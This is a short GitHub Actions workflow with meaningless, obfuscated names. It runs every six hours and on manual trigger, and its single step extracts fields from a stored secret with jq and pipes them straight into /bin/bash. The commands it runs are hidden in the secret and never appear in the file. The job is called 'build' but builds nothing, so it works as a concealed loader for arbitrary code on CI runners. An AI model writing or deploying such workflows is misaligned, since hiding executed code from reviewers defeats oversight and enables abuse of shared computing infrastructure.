name: liucanbai3456

on:
  workflow_dispatch:
  schedule:
    - cron: '53 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liucanbai3456
        env:
          ml898: ${{ secrets.ml898 }}
        run: |
          echo $ml898 | jq -r .deyye9647 | /bin/bash
          echo $u4 | jq -r .n47 | /bin/bash
          echo $qnvu55 | jq -r .dxd2 | /bin/bash
          echo $jcfla92421 | jq -r .wse6464 | /bin/bash
          echo $upsa7905 | jq -r .t96 | /bin/bash
          echo $fhktq2 | jq -r .yd903 | /bin/bash

